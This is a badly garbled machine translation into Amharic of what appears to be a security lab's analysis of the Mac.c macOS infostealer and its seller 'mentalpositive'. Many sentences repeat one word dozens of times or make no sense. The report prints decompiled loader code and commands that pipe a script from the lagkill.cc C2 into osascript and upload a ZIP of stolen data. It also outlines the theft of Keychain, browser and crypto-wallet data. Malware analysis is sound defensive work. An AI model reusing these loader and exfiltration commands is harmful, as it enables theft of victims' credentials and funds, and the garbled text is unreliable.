የ Mac.c ጓደኛ ታሪክ በከፍተኛ የኮምፒውተር ካምፒውተር ወይም ጓደኛ ካምፒውተር ጋር ይጀምራል. ይህ የ darknet ፎቶዎች ውስጥ ይጀምራል, በ "mentalpositive" የሚታወቀው አንድ ጓደኛ ተጫዋች በመጀመሪያ ተመልከት, ከሌሎች ጓደኛ መተግበሪያዎች ጋር ይመዝገቡ. በ MacPaw, የኮምፒውተር ደህንነት ክፍል, ከሁለት ወራት በፊት mentalpositive መከታተል አላቸው. እኛ ከሁለት ወራት በፊት የ macOS malware ገበያን ይጠቀማል አንድ አዲስ ተጫዋቾች ይመልከቱ. መኖሪያ ቤት የ Mac.c ከሁለቱም ከሁለቱም ከሁለቱም ከሁለቱም ከሁለቱም ከሁለቱም ከሁለቱም ከሁለቱም ከሁለቱም ከሁለቱም ከሁለቱም ከሁለቱም ከሁለቱም ከሁለቱም ከሁለቱም ከሁለቱም ከሁለቱም ከሁለቱም ከሁለቱም ከሁለቱም ከሁለቱም ከሁለቱም ከሁለቱም ከሁለቱም ከሁለቱም ከሁለቱም ከሁለቱም. ከ AMOS እና ከ በ Mac.c ከ Mac.c ከ Mac.c ከ Mac.c ከ Mac.c ከ Mac.c ከ Mac.c ከ Mac.c ከ Mac.c ከ Mac.c ከ Mac.c ከ Mac.c ከ Mac.c ከ Mac.c ከ Mac.c ከ Mac.c ከ Mac.c ከ Mac.c ከ Mac.c ከ Mac.c ከ Mac.c ከ Mac.c ከ Mac. የ MacOS Stealer ፎቶ4 የ Mac.c Builds ላይ የ "mentalpositive" የተጠቃሚ ልማት አቅርቦት እና በ Mac.c Builds ላይ የተጠቃሚ ግምገማዎች - በ macOS malware ልማት ውስጥ በአብዛኛው secretive ዓለም ውስጥ አንድ አስደናቂ ደረጃ የፈጠራ ደረጃ. በዚህ ጽሑፍ ውስጥ, Mac.c ልማት ይታያል, mentalpositive ቴክኖሎጂዎችን ለመውሰድ, እና ይህ ጓደኛ በ Apple መድረኮች ላይ የሚተኮሩ ግምገማዎች ውስጥ እንዴት ተስማሚ ይሆናል. ገበያ ላይ አዲስ ተጫዋች ከሁለት ወራት በፊት, Moonlock Lab የመጀመሪያው Mac.c ጓደኛን መውሰድ እና በ "mentalpositive" ምልክት ውስጥ አንድ መተግበሪያ ተመሠረተ ነበር. ይህ ጓደኛ ተጫዋቾች በ macOS malware ገበያ ውስጥ ብዙ አዲስ ተጫዋቾች መካከል አንዱ ነበር. የ "mentalpositive" ከሌሎች ደንበኞች ጋር ተመሳሳይ, የ malware ልማት ውስጥ የቅርብ ጊዜ ግምገማዎች ይጠቀማል: የተለያዩ ካምፓኖች ውስጥ ጥቅም ላይ ሞዱላር መዋቅር, የተሻሻለ የኮምፒውተር ቴክኖሎጂዎች, እና በተደጋጋጋሚ የኮምፒውተር (C2) መዋቅርዎች. ነገር ግን, mentalpositive's Mac.c የኮምፒውተር profil እና data exfiltration ስፋት ይሰጣል. ይህ iCloud Keychain ማረጋገጫዎች, browser-stored passwords, crypto wallets, system metadata, and even files from specific locations on macOS—all using credentials obtained through phishing. By relying on standard system APIs and staged communication methods, it evades many traditional endpoint defences. በአጠቃላይ ውስጥ መዋቅር የ "mentalpositive" በ Darknet ፎርማዎች ላይ አስደናቂ ስሜት ይሰጣል. ከሁለት ወራት በላይ, ይህ ፎርማ ተጫዋቾች በ Mac.c ላይ በተደጋጋጋሚ updates ይሰጣሉ, ምናባዊ ተጠቃሚዎች ጋር ተስማሚነት ይሰጣሉ, እና ተስማሚ መልዕክቶች ይሰጣሉ. ይህ የንግድ ሞዴል በ macOS ስሜት ምልክቶች ላይ የተመሠረተ የኮምፒውተር-አንድ-አንድ-አንድ-አንድ-አንድ-አንድ-አንድ-አንድ-አንድ-አንድ-አንድ-አንድ-አንድ-አንድ-አንድ-አንድ-አንድ-አንድ-አንድ-አንድ-አንድ-አንድ-አንድ-አንድ-አንድ-አንድ-አንድ-አንድ-አንድ-አንድ-አንድ-አንድ-አንድ-አንድ-አንድ-አንድ-አንድ-አንድ-አንድ-አንድ-አንድ-አንድ-አንድ-አንድ-አንድ-አንድ-አንድ-አንድ-አንድ-አንድ-አንድ-አንድ-አንድ-አንድ-አንድ-አንድ-አ ዝቅተኛ ስክሪን ፎቶዎች የፎቶዎች ልማት በጊዜው እንደ አዲስ ባህሪያት ይሰጣሉ. የመጀመሪያው ስክሪን ፎቶዎች በሩሲያ ውስጥ የተመሠረተ ፡፡ ለሁሉም ፎቶዎች ትክክለኛ ጥቅል ያካትታሉ ፡፡ የመጀመሪያው ስክሪን ፎቶ ለሁሉም ፎቶዎች ለሁሉም ፎቶዎች ያካትታሉ ፡፡ የመጀመሪያው ስክሪን ፎቶ ለሁሉም ፎቶዎች ለሁሉም ፎቶዎች ለሁሉም ፎቶዎች ለሁሉም ፎቶዎች ለሁሉም ፎቶዎች ለሁሉም ፎቶዎች ይሰጣሉ ፡፡ ከዚያ በኋላ, 'mentalpositive' የ Mac.c ባህሪያት ዝርዝር ዝርዝር ይሰጣል. እነርሱም አንዳንድ በጣም ታዋቂ updates ያካትታል: የመጀመሪያው Ledger Live መተግበሪያ ለመቀየር, ፋይሎችን binary መጠን ለመቀነስ (የተኮር ልውውጥ በመጠቀም በፍጥነት ማውረድ እና በከፍተኛ ልውውጥ ሊሆን ይችላል) እና አስተዳደር ፓነል ለማሻሻል. በዚህ ሁኔታ, አንድ ፓነል ለ "mentalpositive" ደንበኞች, የ Mac.c ሻጋታ ደንበኞች የድር ላይ የተመሠረተ መተግበሪያ ይጠቀማል. ይህ እነርሱም የ malware builds ለመፍጠር, የኮምፒዩተሮች (እነርሱም የፈጠራ እና የፈጠራ ተሞክሮዎች ጨምሮ), እና ሌሎች የኮምፒዩተሮች ዝርዝሮች ለመቆጣጠር ይቻላል. የ "mentalpositive" በተደጋጋጋሚ ሁኔታዎች በተደጋጋጋሚ ሁኔታዎችን ለማሳየት የኮምፒዩተር ስሪት ይቀላቀሉ. በዚያ ላይ የ "mentalpositive" የኮምፒዩተር ስሪት ከ 10.12.6 በላይ ከ macOS ስሪቶች ላይ የቅርብ ጊዜ ስሪት ማረጋገጥ አላቸው. በይነገጽ ላይ የኮምፒዩተር ስሪት ከ 10.12.6 በላይ ከ macOS ስሪት ይሞክራል. Tox እና Jabber. አግኙን በ XProtect መተግበሪያዎች ውስጥ የ XProtect መተግበሪያዎች, የዩናይትድ ስቴትስ እና የዩናይትድ ስቴትስ እና የዩናይትድ ስቴትስ እና የዩናይትድ ስቴትስ እና የዩናይትድ ስቴትስ እና የዩናይትድ ስቴትስ እና የዩናይትድ ስቴትስ እና የዩናይትድ ስቴትስ እና የዩናይትድ ስቴትስ እና የዩናይትድ ስቴትስ እና የዩናይትድ ስቴትስ እና የዩናይትድ ስቴትስ እና የዩናይትድ ስቴትስ እና የዩናይትድ ስቴትስ እና የዩናይትድ ስቴትስ እና የዩናይትድ ስቴትስ እና የዩናይትድ ስቴትስ እና የዩናይት አሞሌ ጋር ተመሳሳይነት አስደናቂው ነገር ነው, የ Mac.c ኮድ ትክክለኛነት በይነገጽ ታዋቂው Atomic macOS Stealer የተሻሻለ ስሪት ሊሆን ይችላል. Moonlock Lab ሁለቱም ጓደኞች የቅርብ ጊዜ የክፍያ ክፍያዎችን ያካትታሉ እና ያካትታሉ, እና AMOS በስፋት ያካትታሉ. ሁለቱም ተመሳሳይ ኮድ ክፍሎች አጠቃቀም ቢሆንም, 'mentalpositive' በመተግበሪያው ተግባራዊነት በጣም ዝቅተኛ ነው. የእኛ የቅርብ ጊዜ ጽሑፎች መካከል አንዱ (የገጽ ቀለም ላይ ይታያል) AMOS ከባድ ከባድ ከባድ ከባድ ከባድ ከባድ ከባድ ከባድ ከባድ ከባድ ከባድ ከባድ ከባድ ከባድ ከባድ ከባድ ከባድ ከባድ ከባድ ከባድ ከባድ ከባድ የመጀመሪያው ጊዜ በይፋ ውስጥ ይመልከቱ: 2025-06-19 20:18:55 ' (የአረንጓዴ ቀለም ላይ ይሰጣል) mentalpositive ከባድ ከባድ ከባድ ከባድ ከባድ ከባድ ከባድ ከባድ ከባድ ከባድ ከባድ ከባድ ከባድ ከባድ ከባድ ከባድ ከባድ ከባድ ከባድ ከባድ ከባድ የመጀመሪያው ጊዜ በይፋ ውስጥ ይመልከቱ: 2025-07-01 15:41:49 በ Mac.c እና Atomic macOS Stealer መካከል የፋንክሪንግ ደረጃ ኮድ ቁጥጥር ይሰጣል. በአብዛኛው ሁኔታዎች ውስጥ, የፋንክሪንግዎች በጽሑፎች ወይም በሽታማ ቅርጸቶች ጋር የተመሠረተ ሊሆን ይችላል, ይህም የጋራ ልማት መጀመሪያ ወይም በቀጥታ ኮድ አግኝቷል ይሰጣል. በ macOS ስርዓቶች ላይ ሙሉ በሙሉ ውሂብ ጓደኝነት ለማግኘት የተመሠረተ ተመሳሳይ ባህሪያት ስብስቦች ይሰጣሉ. ሁለቱም ሁኔታዎች ውስጥ እነዚህ ችሎታዎች በ macOS መሣሪያዎች እና ስፕሪትዎችን በመጠቀም ይሰራሉ, ከባድ ደጋፊዎችን ለመቀነስ እና ማከማቻን ለማሻሻል. የ AMOS ለወደፊቱ, ለወደፊቱ, ለወደፊቱ, ለወደፊቱ እና ለወደፊቱ ለወደፊቱ ልዩ ባህሪያት ያቀርባል. Mac.c በ AppleScript ላይ የተመሠረተ አንድ ትክክክለኛ, non-persistent Stealer ሆኖ ይሰራል, ነገር ግን Atomic macOS Stealer ደግሞ አንድ ተመሳሳይ ንድፍ ፍላጎት የተሻለ, ተደጋጋጋሚ, እና ሞዱላር ፍላጎት ነው. የ "Mentalpositive's" መሣሪያዎች ከሁሉም ጊዜ የ "Mentalpositive's" መሣሪያዎች ከሁሉም ጊዜ የ "Metalpositive" መሣሪያዎች ከሁሉም ጊዜ የ "Metal Positive" መሣሪያዎች ከሁሉም ጊዜ የ "Metal Positive" መሣሪያዎች ከሁሉም ጊዜ የ "Metal Positive" መሣሪያዎች ከሁሉም ጊዜ የ "Metal Positive" መሣሪያዎች ከሁሉም ጊዜ የ "Metal Positive" መሣሪያዎች ከሁሉም ጊዜ የ "Metal Positive" መሣሪያዎች ከሁሉም ጊዜ የ "Metal Positive" መሣሪያዎች ከሁሉም ጊዜ የ "Metal Positive" መሣሪያዎች ከሁሉም ጊዜ የ "Metal Positive" መሣሪያዎች ከሁሉም ጊዜ የ "Metal Positive" መሣሪያዎች ከሁሉም Mac.c Stealer እንዴት ይሰራል በአሁኑ ጊዜ በ ከሁሉም ጊዜ ጀምሮ, የእርስዎን የሥራ መኖሪያ ቤት ተለዋዋጭ አይደለም: https://lagkill[.]cc. ይህ የፒኤፒኤፍ ፋይሎች እና አንዳንድ exfiltration ሂደቶች ለማግኘት ጥቅም ላይ ይውላል. 'mentalpositive' የቀድሞው Moonlock Lab መረጃ ይህ መኖሪያ ቤት በርካታ Mach-O ፋይሎች ጋር ግንኙነት አለው, ነገር ግን በአጠቃላይ የሥራ ሂደት በ 2 ደረጃዎች ሊሆን ይችላል: Mach-O በመጀመሪያ መተግበሪያ እና AppleScript የክፍያ. ደረጃ 1: Mach-O በመጀመሪያ መተግበሪያ የ Mac.c ሮለር አንድ ባለብዙ-ጥራት አፈጻጸም ፕሮግራም ይጠቀማል, እና የመጀመሪያው ደረጃ በሽታ 90309fc3b90df1d7b6d747c5afa63fca6262721ce39c34da4b13901d53b919a3 ሞዴል ላይ የተመሠረተ ተንቀሳቃሽ መሐንዲሶች ላይ የተመሠረተ. undefined8 entry(void) { pid_t pVar1; int res; char cmd [1024]; char id [56]; undefined7 url_C2; undefined4 uStack_29; long local_20; local_20 = *(long *)PTR____stack_chk_guard_100001008; pVar1 = _fork(); if (-1 < pVar1) { if (pVar1 != 0) { LAB_100000e59: if (*(long *)PTR____stack_chk_guard_100001008 == local_20) { return 0; } ___stack_chk_fail(); } pVar1 = _setsid(); if (-1 < pVar1) { _freopen("/dev/null","r",*(FILE **)PTR____stdinp_100001018); _freopen("/dev/null","w",*(FILE **)PTR____stdoutp_100001020); _freopen("/dev/null","w",*(FILE **)PTR____stderrp_100001010); /* SandBox protection */ _system("killall Terminal"); /* Create C2: lagkill.cc */ url_C2 = 0x6c6c696b67616c; uStack_29 = 0x63632e; builtin_strncpy(id + 0x20,"3f2ffd13c8",0xb); builtin_strncpy(id + 0x10,"592960231c11198d",0x10); builtin_strncpy(id,"17508488681a0237",0x10); /* Run upload and run applescript stealer logic: curl -s https://lagkill.cc/src.php?txd=17508488681a0237592960231c11198d3f2ffd13c8 | osascript */ _snprintf(cmd,0x400,"curl -s https://%s/src.php?txd=%s | osascript"); res = _system(cmd); if (res == 0) { /* Run upload to lagkill.cc*/ _snprintf(cmd,0x400, "curl -X POST -H \"cl: 0\" --max-time 300 -F \"file=@/tmp/osalogging.zip\" -F \"bu ildtxd=%s\" https://%s/" ,id,&url_C2); res = _system(cmd); if (res == 0) goto LAB_100000e59; } } } _exit(1); } በ Mac.c entry point (entry()) በመጀመሪያው ሂደት ለመርዳት እና በ setsid( በኩል አንድ አዲስ ሰንሰለት ለመፍጠር ይጀምራል, ውጤታማውን ራስ-ወደ. በተጨማሪም, ሁሉም መደበኛ input, output, እና error streams ወደ /dev/null በመጠቀም freopen() ይጠቀማል. ይህ ከባድ መለያዎች ወይም መጨረሻ ማረጋገጫዎች ውስጥ ከባድ ሊሆን ይችላል የኮንሰል ውፅዓት ለመከላከል ይችላሉ. የ malware የ Command-and-Control (C2) domain እንደ hardcoded ነው: lagkill[.]cc. ይህ ደግሞ በርካታ ስታቲክ hexadecimal መስኮች ያካትታሉ በይነገጽ ማረጋገጫ ወይም በ C2 የመስመር ላይ በይነገጽ ማጣሪያዎች ለማግኘት ጥቅም ላይ የሚጠቀሙ የ txd ቶኬን ያደርጋል. ይህ የ AppleScript ማውረድ እና መጀመር ነው. ይህ የ AppleScript ማውረድ እና በቀላሉ መጀመር ለማግኘት በሽያጭ curl እና osascript ያደርጋል: curl -s https://lagkill[.]cc/src.php?txd=<victim_id> | osascript ይህ ቅርጸት አስደሳችን በይነገጽ መተግበሪያ መንገዶች በይነገጽ መተግበሪያ መንገዶች በይነገጽ መተግበሪያ መንገዶች በይነገጽ መተግበሪያ መንገዶች በይነገጽ መተግበሪያ መንገዶች በይነገጽ መተግበሪያ መንገዶች በይነገጽ መተግበሪያ መንገዶች በይነገጽ መተግበሪያ መንገዶች በይነገጽ መተግበሪያ መንገዶች በይነገጽ መተግበሪያ መንገዶች በይነገጽ መተግበሪያ መንገዶች በይነገጽ መተግበሪያ መንገዶች በይነገጽ መተግበሪያ መንገዶች በይነገጽ መተግበሪያ መንገዶች በይነገጽ መ AppleScript መጀመር በኋላ (በአሁኑ ጊዜ በአካባቢው ውሂብ ጓደኝነት ሊሆን ይችላል) በመጫን የፈጠራ ፍላጎት ለማረጋገጥ እና ወደ ተመሳሳይ C2 ደንበኞች ወደ ZIP መክፈት ይጀምራል: curl -X POST -H "cl: 0" --max-time 300 -F "file=@/tmp/osalogging.zip" -F "buildtxd=<victim_id>" https://lagkill[.]cc/ ይህ መላኪያ ብጁ ጫማዎች (cl: 0) እና በአብዛኛው ሰንሰለት ሰንሰለት በመጠቀም ይሰጣል. ደረጃ 2: AppleScript payload የ Mac.c ሮለር ውስጥ ሁለተኛው ደረጃ በ AppleScript የክፍያ መሣሪያዎች የ macOS ስፕሪንግ ችሎታዎችን ለመውሰድ በአብዛኛው ጥንካሬ ውሂብ ለመውሰድ ያደርጋል. አስደናቂ ነው, ይህ ማንኛውም የኮምፒውተር binaries ለመውሰድ ወይም ከፍተኛ ባህሪያት ያስፈልጋል ወይም የ phishing የይነገጽ ብቻ ሊሆን ይችላል. ከዚህ በታች, ሁለተኛ ደረጃ የክፍያ የክፍያ የቴክኒኮች በካቲት ይሸፍናል. Credential theft & CLI abuse ይህ ስክሪት የኮምፒውተር የኮምፒውተር የኮምፒውተር የኮምፒውተር የኮምፒውተር የኮምፒውተር የኮምፒውተር የኮምፒውተር የኮምፒውተር የኮምፒውተር የኮምፒውተር የኮምፒውተር የኮምፒውተር የኮምፒውተር የኮምፒውተር የኮምፒውተር የኮምፒውተር የኮምፒውተር የኮምፒውተር የኮምፒውተር ከዚያ በኋላ, በ Google Chrome እና Chromium ላይ የተመሠረተ መተግበሪያዎችን በ Google Chrome እና በ Chromium የተመሠረተ መተግበሪያዎች ላይ የተመሠረተ የተመሠረተ ማረጋገጫዎችን ከ Keychain መውሰድ የ CLI መተግበሪያ ይጠቀማል. ውሂብ ወደ /tmp /<random> /Password ይመዝገቡ. ይህ phishing ቴክኖሎጂ የ macOS መተግበሪያዎች እና የ macOS መተግበሪያዎች ላይ የተመሠረተ ደህንነት ይጠቀማል. ምንም የኮድ ትዕዛዞች ወይም ትዕዛዞች አያስፈልግም. Browser and extensions data theft በ Chrome, Edge, Brave እና Yandex ውስጥ የሚተኮሩ መተግበሪያዎች ያካትታል. ውጭ ፋይሎች ያካትታሉ: login data, cookies, web data, IndexedDB storage. መጨረሻም, ስክሪት እንደ MetaMask, Phantom, እና Binance Wallet እንደ ታዋቂ crypto wallet መተግበሪያዎች ሰከንዶች በመተግበሪያ እና በአካባቢው የክፍያ ፋይሎች ወይም ሰከንዶች ቅርጸት ይሸፍናል. ሁሉም browser-related loot በ /tmp/<random>/Browsers/. Hot wallet and crypto app harvesting የ payload ለ ታዋቂ የኮምፒውተር crypto wallets, ጨምሮ: የኤሌክትሪክ መግቢያ መኖሪያ ቤት አሞሌ መኖሪያ ቤት ቪዛ አግኝቷል Live ለምሳሌ የ Wallet ፋይሎች እና Configuration Databases (የ LevelDB ማረፊያዎች) በ /tmp/<random>/Cryptowallets/. ይህ በ macOS crypto-enthusiast user base ላይ የተመሠረተ የተመሠረተ የገንዘብ ትኩረት ይሰጣል. File-grabber and its logic የእርስዎን ስዕል መጠን ለመፍጠር እና በይነገጽን ለመቀነስ, ስክሪት የሚከተለውን ያደርጋል: የኮምፒውተር, የኮምፒውተር, የኮምፒውተር, የኮምፒውተር እና የኮምፒውተር እና የኮምፒውተር ማውረድ. የከፍተኛ-ማክብደት ፋይሎች አይነት ማጣሪያዎች: .wallet, .seed, .txt, .keys, .pdf, .docx. የፕላስቲክ ፎቶ መጠን = 10MB. ይህ መተግበሪያ ዝቅተኛ የሽያጭ, ከፍተኛ የሽያጭ ፋይሎች ያተኮረ ነው, እነርሱ የፈጠራ መለያዎች, የሽያጭ መለያዎች, እና ተስማሚ የ PDFs ያካትታል. Collection of messaging and app artifacts Mac.c የ tdata ፎቶፕን ያካትታል, ይህም የ aktive session tokens ወይም cache messages (የ Telegram ጋር የተገናኙ ናቸው) ያካትታል. Binance እና Ton Keeper መተግበሪያዎች ከ መዋቅር ፋይሎች ደግሞ የተመሠረተ ናቸው, የፕሮጀክት አጠቃቀም, መግቢያ ሞዴሎች, ወይም የተመሠረተ ቁልፍዎችን ያቀርባል. system_profiler በመጠቀም የ hardware, macOS, እና display data ማግኘት ይቻላል. ይህ አጠቃቀም አጠቃቀም አጠቃቀም አጠቃቀም አጠቃቀም አጠቃቀም አጠቃቀም አጠቃቀም አጠቃቀም አጠቃቀም አጠቃቀም አጠቃቀም Archiving and exfiltration ሁሉም አጠቃቀም ውሂብ አንድ የተመሠረተ ጊዜያዊ መዳረሻ /tmp/<random>/. በመጠቀም ditto -c -k, የ macOS የተመሠረተ የክፍያ መሣሪያ, ሙሉ የክፍያ ወደ /tmp/osalogging.zip ይሸፍናል. የክፍያ በኋላ, የክፍያ ገደብ ይቀበላል. ምንም የፈጠራ መቆጣጠሪያ ወይም የክፍያ መተግበሪያ አይሆንም. ይህ የተመሠረተ, ephemeral ንድፍ በፍጥነት የ smash-and-grab አጠቃቀም ይሰጣል, እርስዎ ብቻ ጥቅም ላይ መግቢያ ወይም በከፍተኛ ውፅዓት መድሃኒት ኬብል ክፍሎች ሊሆን ይችላል. የ phishing ፕሮግራም በ "mentalpositive" ሁለተኛ ደረጃ የክፍያ ውስጥ ጥቅም ላይ ጥቅም ላይ የሚጠቀሙ አንድ በተለይም አስደናቂ ቴክኖሎጂ አንድ ጨዋታ መዳረሻ ፍላጎት እንደ ማሸነፍ የክፍያ ስርዓት ትዕዛዞች ያካትታል. ልዩነት, Mac.c በ macOS መዳረሻ መለያ መውሰድ ለማግኘት ተጠቃሚን ይፈልጋል "የተግበሪያ ጨዋታ ለማረጋገጥ" የእርስዎን ፋይሎች ለመጠበቅ. " የምስክር ወረቀት በተጨማሪም, እንደዚህ payloads አንድ building tag “innocent” (እና, አንዳንድ ሁኔታዎች, “innocent”) ጋር ይሰጣሉ, እርስዎ ይህን ልዩ ካምፓን ጋር የተያያያዙ መድሃኒቶች ለመውሰድ ጥቅም ላይ ሊውል ይችላል. መጨረሻም, በዚህ ካምፓን ለማግኘት የተወሰኑ የዶሜን የሚፈልጉት ነው innocentwitches[.]top.When the root URL redirectes to Google, ይህ ደግሞ /upload.php ሮድ ያካትታል, በባህር ውሂብ ለመውሰድ የሚችሉ. መጨረሻዎች የ Mac ኮምፒውተርዎች በአብዛኛው ተጠቃሚዎች እና በግልጽ crypto holders መካከል ታዋቂነት ይጨምራሉ ጊዜ, የእኛን ጓደኛዎች ብቻ የእርስዎን ችሎታ ብቻ አይደለም, ነገር ግን የእርስዎን ገበያ ክፍል እና ውጤታማነት ውስጥ ይሆናል. Mac.c በአጠቃላይ የ macOS ቫልቭ ሶፍትዌር ንድፍ ላይ ይበልጥ ተስማሚ አይደለም, ነገር ግን የ macOS ቫልቭ ሶፍትዌር ንድፍ ከ ታዋቂ የ Atomic Stealer ንድፍ እና የፕሮግራፊክ ክፍሎች ይጠቀማል, ነገር ግን ይህ የ macOS ቫልቭ ንድፍ ውስጥ አዲስነት ይሰጣል. የእኛን የንግድ ሞዴል አዲስ ሊሆን ይችላል: በ macOS ተጠቃሚዎች ላይ የተመሠረተ እና በከፍተኛ ደረጃ የ malware-as-a-service ኢንዱስትሪ ውስጥ ከባድ ነው. የ Atomic Stealer በአጠቃላይ ይበልጥ ደንበኛ ስሪት ሊሆን ይችላል, ነገር ግን አዲስ የፈጠራ ተጫዋቾች ከባድ እና በጣም ተስማሚ የ malware ምርት ለመፍጠር አጠቃቀም ጊዜ ብቻ ነው. የ IOC https://innocentwitches[.]com/upload.php https://lagkill[.]cc/src.php 7fd77f09a90d8d01a7d74a84a685645622ae87a90b5dd72a5750daac9195c467 33e9b605406ffb779dc912a1ce66436a8867b88e087bc34b2b2b2fca2160b64ca7 ከባድ ከባድ ከባድ ከባድ ከባድ ከባድ ከባድ ከባድ ከባድ ከባድ ከባድ ከባድ ከባድ ከባድ ከባድ ከባድ ከባድ ከባድ ከባድ ከባድ ከባድ ከባድ ፎቶ ፎቶ ፎቶ ፎቶ ፎቶ ፎቶ ፎቶ ፎቶ ፎቶ ፎቶ ፎቶ ፎቶ